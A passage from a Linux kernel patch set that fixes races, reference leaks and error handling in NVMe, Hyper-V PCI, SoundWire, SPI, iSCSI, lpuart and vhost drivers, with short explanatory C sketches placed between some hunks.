+ static enum rq_end_io_ret nvme_keep_alive_end_io(struct request *rq,
+@@ -1209,6 +1234,20 @@ static enum rq_end_io_ret nvme_keep_alive_end_io(struct request *rq,
+ 	struct nvme_ctrl *ctrl = rq->end_io_data;
+ 	unsigned long flags;
+ 	bool startka = false;
++	unsigned long rtt = jiffies - (rq->deadline - rq->timeout);
++	unsigned long delay = nvme_keep_alive_work_period(ctrl);
++
++	/*
++	 * Subtract off the keepalive RTT so nvme_keep_alive_work runs
++	 * at the desired frequency.
++	 */
++	if (rtt <= delay) {
++		delay -= rtt;
++	} else {
++		dev_warn(ctrl->device, "long keepalive RTT (%u ms)\n",
++			 jiffies_to_msecs(rtt));
++		delay = 0;
++	}
+ 
+ 	blk_mq_free_request(rq);
+ 
+@@ -1219,6 +1258,7 @@ static enum rq_end_io_ret nvme_keep_alive_end_io(struct request *rq,
+ 		return RQ_END_IO_NONE;
+ 	}
+ 
++	ctrl->ka_last_check_time = jiffies;
+ 	ctrl->comp_seen = false;
+ 	spin_lock_irqsave(&ctrl->lock, flags);
+ 	if (ctrl->state == NVME_CTRL_LIVE ||
+@@ -1226,7 +1266,7 @@ static enum rq_end_io_ret nvme_keep_alive_end_io(struct request *rq,
+ 		startka = true;
+ 	spin_unlock_irqrestore(&ctrl->lock, flags);
+ 	if (startka)
+-		nvme_queue_keep_alive_work(ctrl);
++		queue_delayed_work(nvme_wq, &ctrl->ka_work, delay);
+ 	return RQ_END_IO_NONE;
+ }
+ 
+@@ -1237,6 +1277,8 @@ static void nvme_keep_alive_work(struct work_struct *work)
+ 	bool comp_seen = ctrl->comp_seen;
+ 	struct request *rq;
+ 
++	ctrl->ka_last_check_time = jiffies;
++
+ 	if ((ctrl->ctratt & NVME_CTRL_ATTR_TBKAS) && comp_seen) {
+ 		dev_dbg(ctrl->device,
+ 			"reschedule traffic based keep-alive timer\n");
+diff --git a/drivers/nvme/host/nvme.h b/drivers/nvme/host/nvme.h
+index 3f82de6060ef7..2aa514c3dfa17 100644
+--- a/drivers/nvme/host/nvme.h
++++ b/drivers/nvme/host/nvme.h
+@@ -323,6 +323,7 @@ struct nvme_ctrl {
+ 	struct delayed_work ka_work;
+ 	struct delayed_work failfast_work;
+ 	struct nvme_command ka_cmd;
++	unsigned long ka_last_check_time;
+ 	struct work_struct fw_act_work;
+ 	unsigned long events;
+ 
+diff --git a/drivers/pci/controller/pci-hyperv.c b/drivers/pci/controller/pci-hyperv.c
+index f1ec8931dfbc5..3351863352d36 100644
+--- a/drivers/pci/controller/pci-hyperv.c
++++ b/drivers/pci/controller/pci-hyperv.c
+@@ -489,7 +489,10 @@ struct hv_pcibus_device {
+ 	struct fwnode_handle *fwnode;
+ 	/* Protocol version negotiated with the host */
+ 	enum pci_protocol_version_t protocol_version;
++
++	struct mutex state_lock;
+ 	enum hv_pcibus_state state;
++
+ 	struct hv_device *hdev;
+ 	resource_size_t low_mmio_space;
+ 	resource_size_t high_mmio_space;
+@@ -553,19 +556,10 @@ struct hv_dr_state {
+ 	struct hv_pcidev_description func[];
+ };
+ 
+-enum hv_pcichild_state {
+-	hv_pcichild_init = 0,
+-	hv_pcichild_requirements,
+-	hv_pcichild_resourced,
+-	hv_pcichild_ejecting,
+-	hv_pcichild_maximum
+-};
+-
+ struct hv_pci_dev {
+ 	/* List protected by pci_rescan_remove_lock */
+ 	struct list_head list_entry;
+ 	refcount_t refs;
+-	enum hv_pcichild_state state;
+ 	struct pci_slot *pci_slot;
+ 	struct hv_pcidev_description desc;
+ 	bool reported_missing;
+@@ -656,6 +650,11 @@ static void hv_arch_irq_unmask(struct irq_data *data)
+ 	pbus = pdev->bus;
+ 	hbus = container_of(pbus->sysdata, struct hv_pcibus_device, sysdata);
+ 	int_desc = data->chip_data;
++	if (!int_desc) {
++		dev_warn(&hbus->hdev->device, "%s() can not unmask irq %u\n",
++			 __func__, data->irq);
++		return;
++	}
+ 
+ 	spin_lock_irqsave(&hbus->retarget_msi_interrupt_lock, flags);
+ 
+@@ -1924,12 +1923,6 @@ static void hv_compose_msi_msg(struct irq_data *data, struct msi_msg *msg)
+ 		hv_pci_onchannelcallback(hbus);
+ 		spin_unlock_irqrestore(&channel->sched_lock, flags);
+ 
+-		if (hpdev->state == hv_pcichild_ejecting) {
+-			dev_err_once(&hbus->hdev->device,
+-				     "the device is being ejected\n");
+-			goto enable_tasklet;
+-		}
+-
+ 		udelay(100);
+ 	}
+ 
+@@ -2535,6 +2528,8 @@ static void pci_devices_present_work(struct work_struct *work)
+ 	if (!dr)
+ 		return;
+ 
++	mutex_lock(&hbus->state_lock);
++
+ 	/* First, mark all existing children as reported missing. */
+ 	spin_lock_irqsave(&hbus->device_list_lock, flags);
+ 	list_for_each_entry(hpdev, &hbus->children, list_entry) {
+@@ -2616,6 +2611,8 @@ static void pci_devices_present_work(struct work_struct *work)
+ 		break;
+ 	}
+ 
++	mutex_unlock(&hbus->state_lock);
++
+ 	kfree(dr);
+ }
+ 
+@@ -2764,7 +2761,7 @@ static void hv_eject_device_work(struct work_struct *work)
+ 	hpdev = container_of(work, struct hv_pci_dev, wrk);
+ 	hbus = hpdev->hbus;
+ 
+-	WARN_ON(hpdev->state != hv_pcichild_ejecting);
++	mutex_lock(&hbus->state_lock);
+ 
+ 	/*
+ 	 * Ejection can come before or after the PCI bus has been set up, so
+@@ -2802,6 +2799,8 @@ static void hv_eject_device_work(struct work_struct *work)
+ 	put_pcichild(hpdev);
+ 	put_pcichild(hpdev);
+ 	/* hpdev has been freed. Do not use it any more. */
++
++	mutex_unlock(&hbus->state_lock);
+ }
+ 
+ /**
+@@ -2822,7 +2821,6 @@ static void hv_pci_eject_device(struct hv_pci_dev *hpdev)
+ 		return;
+ 	}
+ 
+-	hpdev->state = hv_pcichild_ejecting;
+ 	get_pcichild(hpdev);
+ 	INIT_WORK(&hpdev->wrk, hv_eject_device_work);
+ 	queue_work(hbus->wq, &hpdev->wrk);
+@@ -3251,8 +3249,10 @@ static int hv_pci_enter_d0(struct hv_device *hdev)
+ 	struct pci_bus_d0_entry *d0_entry;
+ 	struct hv_pci_compl comp_pkt;
+ 	struct pci_packet *pkt;
++	bool retry = true;
+ 	int ret;
+ 
++enter_d0_retry:
+ 	/*
+ 	 * Tell the host that the bus is ready to use, and moved into the
+ 	 * powered-on state.  This includes telling the host which region
+@@ -3279,6 +3279,38 @@ static int hv_pci_enter_d0(struct hv_device *hdev)
+ 	if (ret)
+ 		goto exit;
+ 
++	/*
++	 * In certain cases (kdump) the PCI device of interest was
++	 * not cleanly shut down and its resources are still held on the
++	 * host side, so the host could return an invalid device status.
++	 * We need to explicitly request the host to release the resources
++	 * and try to enter D0 again.
++	 */
++	if (comp_pkt.completion_status < 0 && retry) {
++		retry = false;
++
++		dev_err(&hdev->device, "Retrying D0 Entry\n");
++
++		/*
++		 * hv_pci_bus_exit() calls hv_send_resources_released()
++		 * to free up the resources of its child devices.
++		 * In the kdump kernel we need to set
++		 * wslot_res_allocated to 255 so that it scans all child
++		 * devices and releases the resources allocated in the
++		 * normal kernel before the panic happened.
++		 */
++		hbus->wslot_res_allocated = 255;
++
++		ret = hv_pci_bus_exit(hdev, true);
++
++		if (ret == 0) {
++			kfree(pkt);
++			goto enter_d0_retry;
++		}
++		dev_err(&hdev->device,
++			"Retrying D0 failed with ret %d\n", ret);
++	}
++
+ 	if (comp_pkt.completion_status < 0) {
+ 		dev_err(&hdev->device,
+ 			"PCI Pass-through VSP failed D0 Entry with status %x\n",
+@@ -3321,6 +3353,24 @@ static int hv_pci_query_relations(struct hv_device *hdev)
+ 	if (!ret)
+ 		ret = wait_for_response(hdev, &comp);
+ 
++	/*
++	 * In the case of fast device addition/removal, it's possible that
++	 * vmbus_sendpacket() or wait_for_response() returns -ENODEV but we
++	 * already got a PCI_BUS_RELATIONS* message from the host and the
++	 * channel callback already scheduled a work item on hbus->wq, which can be
++	 * running pci_devices_present_work() -> survey_child_resources() ->
++	 * complete(&hbus->survey_event), even after hv_pci_query_relations()
++	 * exits and the stack variable 'comp' is no longer valid; as a result,
++	 * a hang or a page fault may happen when the complete() calls
++	 * raw_spin_lock_irqsave(). Flush hbus->wq before we exit from
++	 * hv_pci_query_relations() to avoid the issues. Note: if 'ret' is
++	 * -ENODEV, there can't be any more work items scheduled on hbus->wq
++	 * after the flush_workqueue(): see vmbus_onoffer_rescind() ->
++	 * vmbus_reset_channel_cb(), vmbus_rescind_cleanup() ->
++	 * channel->rescind = true.
++	 */
++	flush_workqueue(hbus->wq);
++
+ 	return ret;
+ }
+ 
+@@ -3506,7 +3556,6 @@ static int hv_pci_probe(struct hv_device *hdev,
+ 	struct hv_pcibus_device *hbus;
+ 	u16 dom_req, dom;
+ 	char *name;
+-	bool enter_d0_retry = true;
+ 	int ret;
+ 
+ 	/*
+@@ -3542,6 +3591,7 @@ static int hv_pci_probe(struct hv_device *hdev,
+ 		return -ENOMEM;
+ 
+ 	hbus->bridge = bridge;
++	mutex_init(&hbus->state_lock);
+ 	hbus->state = hv_pcibus_init;
+ 	hbus->wslot_res_allocated = -1;
+ 
+@@ -3646,49 +3696,15 @@ static int hv_pci_probe(struct hv_device *hdev,
+ 	if (ret)
+ 		goto free_fwnode;
+ 
+-retry:
+ 	ret = hv_pci_query_relations(hdev);
+ 	if (ret)
+ 		goto free_irq_domain;
+ 
+-	ret = hv_pci_enter_d0(hdev);
+-	/*
+-	 * In certain case (Kdump) the pci device of interest was
+-	 * not cleanly shut down and resource is still held on host
+-	 * side, the host could return invalid device status.
+-	 * We need to explicitly request host to release the resource
+-	 * and try to enter D0 again.
+-	 * Since the hv_pci_bus_exit() call releases structures
+-	 * of all its child devices, we need to start the retry from
+-	 * hv_pci_query_relations() call, requesting host to send
+-	 * the synchronous child device relations message before this
+-	 * information is needed in hv_send_resources_allocated()
+-	 * call later.
+-	 */
+-	if (ret == -EPROTO && enter_d0_retry) {
+-		enter_d0_retry = false;
+-
+-		dev_err(&hdev->device, "Retrying D0 Entry\n");
+-
+-		/*
+-		 * Hv_pci_bus_exit() calls hv_send_resources_released()
+-		 * to free up resources of its child devices.
+-		 * In the kdump kernel we need to set the
+-		 * wslot_res_allocated to 255 so it scans all child
+-		 * devices to release resources allocated in the
+-		 * normal kernel before panic happened.
+-		 */
+-		hbus->wslot_res_allocated = 255;
+-		ret = hv_pci_bus_exit(hdev, true);
+-
+-		if (ret == 0)
+-			goto retry;
++	mutex_lock(&hbus->state_lock);
+ 
+-		dev_err(&hdev->device,
+-			"Retrying D0 failed with ret %d\n", ret);
+-	}
++	ret = hv_pci_enter_d0(hdev);
+ 	if (ret)
+-		goto free_irq_domain;
++		goto release_state_lock;
+ 
+ 	ret = hv_pci_allocate_bridge_windows(hbus);
+ 	if (ret)
+@@ -3706,12 +3722,15 @@ retry:
+ 	if (ret)
+ 		goto free_windows;
+ 
++	mutex_unlock(&hbus->state_lock);
+ 	return 0;
+ 
+ free_windows:
+ 	hv_pci_free_bridge_windows(hbus);
+ exit_d0:
+ 	(void) hv_pci_bus_exit(hdev, true);
++release_state_lock:
++	mutex_unlock(&hbus->state_lock);
+ free_irq_domain:
+ 	irq_domain_remove(hbus->irq_domain);
+ free_fwnode:
+@@ -3965,20 +3984,26 @@ static int hv_pci_resume(struct hv_device *hdev)
+ 	if (ret)
+ 		goto out;
+ 
++	mutex_lock(&hbus->state_lock);
++
+ 	ret = hv_pci_enter_d0(hdev);
+ 	if (ret)
+-		goto out;
++		goto release_state_lock;
+ 
+ 	ret = hv_send_resources_allocated(hdev);
+ 	if (ret)
+-		goto out;
++		goto release_state_lock;
+ 
+ 	prepopulate_bars(hbus);
+ 
+ 	hv_pci_restore_msi_state(hbus);
+ 
+ 	hbus->state = hv_pcibus_installed;
++	mutex_unlock(&hbus->state_lock);
+ 	return 0;
++
++release_state_lock:
++	mutex_unlock(&hbus->state_lock);
+ out:
+ 	vmbus_close(hdev->channel);
+ 	return ret;
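
The pci-hyperv changes above serialize bus state transitions behind the new
hbus->state_lock mutex and move the kdump retry into hv_pci_enter_d0()
itself, so a failed D0 entry no longer forces the relations query to be
redone. A compilable sketch of the retry-once shape follows;
request_d0()/release_bus() are illustrative stand-ins for the real host
messages, not driver functions:

#include <stdio.h>

/* Sketch of the retry-once pattern in hv_pci_enter_d0() above: one
 * goto-based retry, gated by a flag so a second failure falls
 * through to the normal error handling.
 */
static int request_d0(int attempt) { return attempt == 0 ? -1 : 0; }
static int release_bus(void) { return 0; }

static int enter_d0(void)
{
	int attempt = 0;
	int retry = 1;
	int ret;

retry_d0:
	ret = request_d0(attempt++);
	if (ret < 0 && retry) {
		retry = 0;
		fprintf(stderr, "Retrying D0 Entry\n");
		if (release_bus() == 0)
			goto retry_d0;
	}
	return ret;
}

int main(void)
{
	printf("enter_d0() = %d\n", enter_d0());
	return 0;
}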
+diff --git a/drivers/platform/x86/amd/pmf/core.c b/drivers/platform/x86/amd/pmf/core.c
+index dc9803e1a4b9b..73d2357e32f8e 100644
+--- a/drivers/platform/x86/amd/pmf/core.c
++++ b/drivers/platform/x86/amd/pmf/core.c
+@@ -297,6 +297,8 @@ static void amd_pmf_init_features(struct amd_pmf_dev *dev)
+ 	/* Enable Static Slider */
+ 	if (is_apmf_func_supported(dev, APMF_FUNC_STATIC_SLIDER_GRANULAR)) {
+ 		amd_pmf_init_sps(dev);
++		dev->pwr_src_notifier.notifier_call = amd_pmf_pwr_src_notify_call;
++		power_supply_reg_notifier(&dev->pwr_src_notifier);
+ 		dev_dbg(dev->dev, "SPS enabled and Platform Profiles registered\n");
+ 	}
+ 
+@@ -315,8 +317,10 @@ static void amd_pmf_init_features(struct amd_pmf_dev *dev)
+ 
+ static void amd_pmf_deinit_features(struct amd_pmf_dev *dev)
+ {
+-	if (is_apmf_func_supported(dev, APMF_FUNC_STATIC_SLIDER_GRANULAR))
++	if (is_apmf_func_supported(dev, APMF_FUNC_STATIC_SLIDER_GRANULAR)) {
++		power_supply_unreg_notifier(&dev->pwr_src_notifier);
+ 		amd_pmf_deinit_sps(dev);
++	}
+ 
+ 	if (is_apmf_func_supported(dev, APMF_FUNC_AUTO_MODE)) {
+ 		amd_pmf_deinit_auto_mode(dev);
+@@ -399,9 +403,6 @@ static int amd_pmf_probe(struct platform_device *pdev)
+ 	apmf_install_handler(dev);
+ 	amd_pmf_dbgfs_register(dev);
+ 
+-	dev->pwr_src_notifier.notifier_call = amd_pmf_pwr_src_notify_call;
+-	power_supply_reg_notifier(&dev->pwr_src_notifier);
+-
+ 	dev_info(dev->dev, "registered PMF device successfully\n");
+ 
+ 	return 0;
+@@ -411,7 +412,6 @@ static int amd_pmf_remove(struct platform_device *pdev)
+ {
+ 	struct amd_pmf_dev *dev = platform_get_drvdata(pdev);
+ 
+-	power_supply_unreg_notifier(&dev->pwr_src_notifier);
+ 	amd_pmf_deinit_features(dev);
+ 	apmf_acpi_deinit(dev);
+ 	amd_pmf_dbgfs_unregister(dev);
+diff --git a/drivers/s390/cio/device.c b/drivers/s390/cio/device.c
+index ba4c69226c337..02813b63f90fd 100644
+--- a/drivers/s390/cio/device.c
++++ b/drivers/s390/cio/device.c
+@@ -1367,6 +1367,7 @@ void ccw_device_set_notoper(struct ccw_device *cdev)
+ enum io_sch_action {
+ 	IO_SCH_UNREG,
+ 	IO_SCH_ORPH_UNREG,
++	IO_SCH_UNREG_CDEV,
+ 	IO_SCH_ATTACH,
+ 	IO_SCH_UNREG_ATTACH,
+ 	IO_SCH_ORPH_ATTACH,
+@@ -1399,7 +1400,7 @@ static enum io_sch_action sch_get_action(struct subchannel *sch)
+ 	}
+ 	if ((sch->schib.pmcw.pam & sch->opm) == 0) {
+ 		if (ccw_device_notify(cdev, CIO_NO_PATH) != NOTIFY_OK)
+-			return IO_SCH_UNREG;
++			return IO_SCH_UNREG_CDEV;
+ 		return IO_SCH_DISC;
+ 	}
+ 	if (device_is_disconnected(cdev))
+@@ -1461,6 +1462,7 @@ static int io_subchannel_sch_event(struct subchannel *sch, int process)
+ 	case IO_SCH_ORPH_ATTACH:
+ 		ccw_device_set_disconnected(cdev);
+ 		break;
++	case IO_SCH_UNREG_CDEV:
+ 	case IO_SCH_UNREG_ATTACH:
+ 	case IO_SCH_UNREG:
+ 		if (!cdev)
+@@ -1494,6 +1496,7 @@ static int io_subchannel_sch_event(struct subchannel *sch, int process)
+ 		if (rc)
+ 			goto out;
+ 		break;
++	case IO_SCH_UNREG_CDEV:
+ 	case IO_SCH_UNREG_ATTACH:
+ 		spin_lock_irqsave(sch->lock, flags);
+ 		sch_set_cdev(sch, NULL);
+diff --git a/drivers/soundwire/dmi-quirks.c b/drivers/soundwire/dmi-quirks.c
+index 58ea013fa918a..2a1096dab63d3 100644
+--- a/drivers/soundwire/dmi-quirks.c
++++ b/drivers/soundwire/dmi-quirks.c
+@@ -99,6 +99,13 @@ static const struct dmi_system_id adr_remap_quirk_table[] = {
+ 		},
+ 		.driver_data = (void *)intel_tgl_bios,
+ 	},
++	{
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "HP"),
++			DMI_MATCH(DMI_BOARD_NAME, "8709"),
++		},
++		.driver_data = (void *)intel_tgl_bios,
++	},
+ 	{
+ 		/* quirk used for NUC15 'Bishop County' LAPBC510 and LAPBC710 skews */
+ 		.matches = {
+diff --git a/drivers/soundwire/qcom.c b/drivers/soundwire/qcom.c
+index 21c50972047f5..b2eb3090f4b46 100644
+--- a/drivers/soundwire/qcom.c
++++ b/drivers/soundwire/qcom.c
+@@ -1090,8 +1090,10 @@ static int qcom_swrm_startup(struct snd_pcm_substream *substream,
+ 	}
+ 
+ 	sruntime = sdw_alloc_stream(dai->name);
+-	if (!sruntime)
+-		return -ENOMEM;
++	if (!sruntime) {
++		ret = -ENOMEM;
++		goto err_alloc;
++	}
+ 
+ 	ctrl->sruntime[dai->id] = sruntime;
+ 
+@@ -1101,12 +1103,19 @@ static int qcom_swrm_startup(struct snd_pcm_substream *substream,
+ 		if (ret < 0 && ret != -ENOTSUPP) {
+ 			dev_err(dai->dev, "Failed to set sdw stream on %s\n",
+ 				codec_dai->name);
+-			sdw_release_stream(sruntime);
+-			return ret;
++			goto err_set_stream;
+ 		}
+ 	}
+ 
+ 	return 0;
++
++err_set_stream:
++	sdw_release_stream(sruntime);
++err_alloc:
++	pm_runtime_mark_last_busy(ctrl->dev);
++	pm_runtime_put_autosuspend(ctrl->dev);
++
++	return ret;
+ }
+ 
+ static void qcom_swrm_shutdown(struct snd_pcm_substream *substream,
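
The qcom_swrm_startup() fix above converts the early returns into a single
goto-based unwind so that both failure paths release the stream and drop the
runtime-PM reference taken at the top of the function. A small sketch of
that unwind ordering, with malloc()/free() standing in for the stream
allocation and a comment marking where the PM reference is dropped:

#include <stdio.h>
#include <stdlib.h>

/* Sketch: every failure after a resource is taken must release it,
 * and later failures unwind through the earlier labels in reverse
 * order.  The resource names are illustrative, not the SoundWire API.
 */
static int start_stream(void)
{
	char *stream;
	int ret;

	stream = malloc(32);		/* ~ sdw_alloc_stream() */
	if (!stream) {
		ret = -12;		/* -ENOMEM */
		goto err_alloc;
	}

	ret = -5;			/* pretend set_stream() failed */
	if (ret < 0)
		goto err_set_stream;

	return 0;

err_set_stream:
	free(stream);			/* ~ sdw_release_stream() */
err_alloc:
	/* ~ pm_runtime_put_autosuspend(): drop the runtime-PM ref,
	 * which the original early returns leaked. */
	return ret;
}

int main(void)
{
	printf("start_stream() = %d\n", start_stream());
	return 0;
}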
+diff --git a/drivers/spi/spi-fsl-lpspi.c b/drivers/spi/spi-fsl-lpspi.c
+index e8c1c8a4c6c82..9e324d72596af 100644
+--- a/drivers/spi/spi-fsl-lpspi.c
++++ b/drivers/spi/spi-fsl-lpspi.c
+@@ -905,9 +905,14 @@ static int fsl_lpspi_probe(struct platform_device *pdev)
+ 	ret = fsl_lpspi_dma_init(&pdev->dev, fsl_lpspi, controller);
+ 	if (ret == -EPROBE_DEFER)
+ 		goto out_pm_get;
+-
+ 	if (ret < 0)
+ 		dev_err(&pdev->dev, "dma setup error %d, use pio\n", ret);
++	else
++		/*
++		 * Disable the LPSPI module IRQ when DMA mode is enabled
++		 * successfully, to prevent unexpected LPSPI module IRQ events.
++		 */
++		disable_irq(irq);
+ 
+ 	ret = devm_spi_register_controller(&pdev->dev, controller);
+ 	if (ret < 0) {
+diff --git a/drivers/spi/spi-geni-qcom.c b/drivers/spi/spi-geni-qcom.c
+index 4e83cc5b445d8..dd1581893fe72 100644
+--- a/drivers/spi/spi-geni-qcom.c
++++ b/drivers/spi/spi-geni-qcom.c
+@@ -595,6 +595,8 @@ static int spi_geni_init(struct spi_geni_master *mas)
+ 			geni_se_select_mode(se, GENI_GPI_DMA);
+ 			dev_dbg(mas->dev, "Using GPI DMA mode for SPI\n");
+ 			break;
++		} else if (ret == -EPROBE_DEFER) {
++			goto out_pm;
+ 		}
+ 		/*
+ 		 * in case of failure to get dma channel, we can still do the
+diff --git a/drivers/target/iscsi/iscsi_target_nego.c b/drivers/target/iscsi/iscsi_target_nego.c
+index ff49c8f3fe241..62b2d0dcfda86 100644
+--- a/drivers/target/iscsi/iscsi_target_nego.c
++++ b/drivers/target/iscsi/iscsi_target_nego.c
+@@ -1128,6 +1128,7 @@ int iscsi_target_locate_portal(
+ 	iscsi_target_set_sock_callbacks(conn);
+ 
+ 	login->np = np;
++	conn->tpg = NULL;
+ 
+ 	login_req = (struct iscsi_login_req *) login->req;
+ 	payload_length = ntoh24(login_req->dlength);
+@@ -1195,7 +1196,6 @@ int iscsi_target_locate_portal(
+ 	 */
+ 	sessiontype = strncmp(s_buf, DISCOVERY, 9);
+ 	if (!sessiontype) {
+-		conn->tpg = iscsit_global->discovery_tpg;
+ 		if (!login->leading_connection)
+ 			goto get_target;
+ 
+@@ -1212,9 +1212,11 @@ int iscsi_target_locate_portal(
+ 		 * Serialize access across the discovery struct iscsi_portal_group to
+ 		 * process login attempt.
+ 		 */
++		conn->tpg = iscsit_global->discovery_tpg;
+ 		if (iscsit_access_np(np, conn->tpg) < 0) {
+ 			iscsit_tx_login_rsp(conn, ISCSI_STATUS_CLS_TARGET_ERR,
+ 				ISCSI_LOGIN_STATUS_SVC_UNAVAILABLE);
++			conn->tpg = NULL;
+ 			ret = -1;
+ 			goto out;
+ 		}
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index dc7ac1ddbca5e..1093c74b52840 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -257,6 +257,7 @@ struct lpuart_port {
+ 	unsigned int		txfifo_size;
+ 	unsigned int		rxfifo_size;
+ 
++	u8			rx_watermark;
+ 	bool			lpuart_dma_tx_use;
+ 	bool			lpuart_dma_rx_use;
+ 	struct dma_chan		*dma_tx_chan;
+@@ -283,38 +284,45 @@ struct lpuart_soc_data {
+ 	enum lpuart_type devtype;
+ 	char iotype;
+ 	u8 reg_off;
++	u8 rx_watermark;
+ };
+ 
+ static const struct lpuart_soc_data vf_data = {
+ 	.devtype = VF610_LPUART,
+ 	.iotype = UPIO_MEM,
++	.rx_watermark = 1,
+ };
+ 
+ static const struct lpuart_soc_data ls1021a_data = {
+ 	.devtype = LS1021A_LPUART,
+ 	.iotype = UPIO_MEM32BE,
++	.rx_watermark = 1,
+ };
+ 
+ static const struct lpuart_soc_data ls1028a_data = {
+ 	.devtype = LS1028A_LPUART,
+ 	.iotype = UPIO_MEM32,
++	.rx_watermark = 0,
+ };
+ 
+ static struct lpuart_soc_data imx7ulp_data = {
+ 	.devtype = IMX7ULP_LPUART,
+ 	.iotype = UPIO_MEM32,
+ 	.reg_off = IMX_REG_OFF,
++	.rx_watermark = 1,
+ };
+ 
+ static struct lpuart_soc_data imx8qxp_data = {
+ 	.devtype = IMX8QXP_LPUART,
+ 	.iotype = UPIO_MEM32,
+ 	.reg_off = IMX_REG_OFF,
++	.rx_watermark = 1,
+ };
+ static struct lpuart_soc_data imxrt1050_data = {
+ 	.devtype = IMXRT1050_LPUART,
+ 	.iotype = UPIO_MEM32,
+ 	.reg_off = IMX_REG_OFF,
++	.rx_watermark = 1,
+ };
+ 
+ static const struct of_device_id lpuart_dt_ids[] = {
+@@ -1533,7 +1541,7 @@ static void lpuart_setup_watermark(struct lpuart_port *sport)
+ 	}
+ 
+ 	writeb(0, sport->port.membase + UARTTWFIFO);
+-	writeb(1, sport->port.membase + UARTRWFIFO);
++	writeb(sport->rx_watermark, sport->port.membase + UARTRWFIFO);
+ 
+ 	/* Restore cr2 */
+ 	writeb(cr2_saved, sport->port.membase + UARTCR2);
+@@ -1568,7 +1576,8 @@ static void lpuart32_setup_watermark(struct lpuart_port *sport)
+ 	lpuart32_write(&sport->port, val, UARTFIFO);
+ 
+ 	/* set the watermark */
+-	val = (0x1 << UARTWATER_RXWATER_OFF) | (0x0 << UARTWATER_TXWATER_OFF);
++	val = (sport->rx_watermark << UARTWATER_RXWATER_OFF) |
++	      (0x0 << UARTWATER_TXWATER_OFF);
+ 	lpuart32_write(&sport->port, val, UARTWATER);
+ 
+ 	/* Restore cr2 */
+@@ -2714,6 +2723,7 @@ static int lpuart_probe(struct platform_device *pdev)
+ 	sport->port.dev = &pdev->dev;
+ 	sport->port.type = PORT_LPUART;
+ 	sport->devtype = sdata->devtype;
++	sport->rx_watermark = sdata->rx_watermark;
+ 	ret = platform_get_irq(pdev, 0);
+ 	if (ret < 0)
+ 		return ret;
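
The lpuart change above turns the hard-coded RX FIFO watermark of 1 into
per-SoC data, since the LS1028A needs a watermark of 0. A sketch of the
table-driven selection follows, with the soc_data struct trimmed to the one
relevant field and the values mirroring the patch:

#include <stdio.h>

/* Sketch: each SoC variant carries its own RX watermark, copied into
 * the port at probe time instead of being hard-coded in the
 * watermark-setup helpers.
 */
struct soc_data {
	const char *name;
	unsigned char rx_watermark;
};

static const struct soc_data socs[] = {
	{ "vf610",     1 },
	{ "ls1021a",   1 },
	{ "ls1028a",   0 },	/* the variant that needs 0 */
	{ "imx7ulp",   1 },
	{ "imx8qxp",   1 },
	{ "imxrt1050", 1 },
};

int main(void)
{
	for (unsigned i = 0; i < sizeof(socs) / sizeof(socs[0]); i++)
		printf("%-10s rx_watermark=%u\n",
		       socs[i].name, (unsigned)socs[i].rx_watermark);
	return 0;
}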
+diff --git a/drivers/usb/gadget/udc/amd5536udc_pci.c b/drivers/usb/gadget/udc/amd5536udc_pci.c
+index c80f9bd51b750..a36913ae31f9e 100644
+--- a/drivers/usb/gadget/udc/amd5536udc_pci.c
++++ b/drivers/usb/gadget/udc/amd5536udc_pci.c
+@@ -170,6 +170,9 @@ static int udc_pci_probe(
+ 		retval = -ENODEV;
+ 		goto err_probe;
+ 	}
++
++	udc = dev;
++
+ 	return 0;
+ 
+ err_probe:
+diff --git a/drivers/vhost/net.c b/drivers/vhost/net.c
+index 4c538b30fd76d..4418192ab8aaa 100644
+--- a/drivers/vhost/net.c
++++ b/drivers/vhost/net.c
+@@ -934,13 +934,18 @@ static void handle_tx_zerocopy(struct vhost_net *net, struct socket *sock)
+ 
+ 		err = sock->ops->sendmsg(sock, &msg, len);
+ 		if (unlikely(err < 0)) {
++			bool retry = err == -EAGAIN || err == -ENOMEM || err == -ENOBUFS;
++
+ 			if (zcopy_used) {
+ 				if (vq->heads[ubuf->desc].len == VHOST_DMA_IN_PROGRESS)
+ 					vhost_net_ubuf_put(ubufs);
+-				nvq->upend_idx = ((unsigned)nvq->upend_idx - 1)
+-					% UIO_MAXIOV;
++				if (retry)
++					nvq->upend_idx = ((unsigned)nvq->upend_idx - 1)
++						% UIO_MAXIOV;
++				else
++					vq->heads[ubuf->desc].len = VHOST_DMA_DONE_LEN;
+ 			}
+-			if (err == -EAGAIN || err == -ENOMEM || err == -ENOBUFS) {
++			if (retry) {
+ 				vhost_discard_vq_desc(vq, 1);
+ 				vhost_net_enable_vq(net, vq);
+ 				break;
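
The vhost-net hunk above distinguishes transient sendmsg() errors, which
rewind the descriptor and retry, from fatal ones, which must complete the
zerocopy buffer so the guest is not left waiting forever. A sketch of the
classification, using the same three errno values as the patch:

#include <stdio.h>
#include <errno.h>

/* Sketch: only out-of-resource errors are worth retrying; anything
 * else marks the in-flight zerocopy DMA as done and drops the buffer.
 */
static int is_retryable(int err)
{
	return err == -EAGAIN || err == -ENOMEM || err == -ENOBUFS;
}

int main(void)
{
	int errs[] = { -EAGAIN, -EIO, -ENOBUFS, -EFAULT };

	for (unsigned i = 0; i < sizeof(errs) / sizeof(errs[0]); i++)
		printf("err %d -> %s\n", errs[i],
		       is_retryable(errs[i]) ?
		       "rewind upend_idx and retry" :
		       "mark DMA done, drop the buffer");
	return 0;
}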
+diff --git a/drivers/vhost/vdpa.c b/drivers/vhost/vdpa.c
+index d591f77961aa8..31a156669a531 100644
+--- a/drivers/vhost/vdpa.c
++++ b/drivers/vhost/vdpa.c
+@@ -377,7 +377,10 @@ static long vhost_vdpa_set_features(struct vhost_vdpa *v, u64 __user *featurep)
+ {
+ 	struct vdpa_device *vdpa = v->vdpa;
+ 	const struct vdpa_config_ops *ops = vdpa->config;
++	struct vhost_dev *d = &v->vdev;
++	u64 actual_features;
+ 	u64 features;
++	int i;
+ 
+ 	/*
+ 	 * It's not allowed to change the features after they have
+@@ -392,6 +395,16 @@ static long vhost_vdpa_set_features(struct vhost_vdpa *v, u64 __user *featurep)
+ 	if (vdpa_set_features(vdpa, features))
+ 		return -EINVAL;
+ 
++	/* let the vqs know what has been configured */
++	actual_features = ops->get_driver_features(vdpa);
++	for (i = 0; i < d->nvqs; ++i) {
++		struct vhost_virtqueue *vq = d->vqs[i];
++
++		mutex_lock(&vq->mutex);
++		vq->acked_features = actual_features;
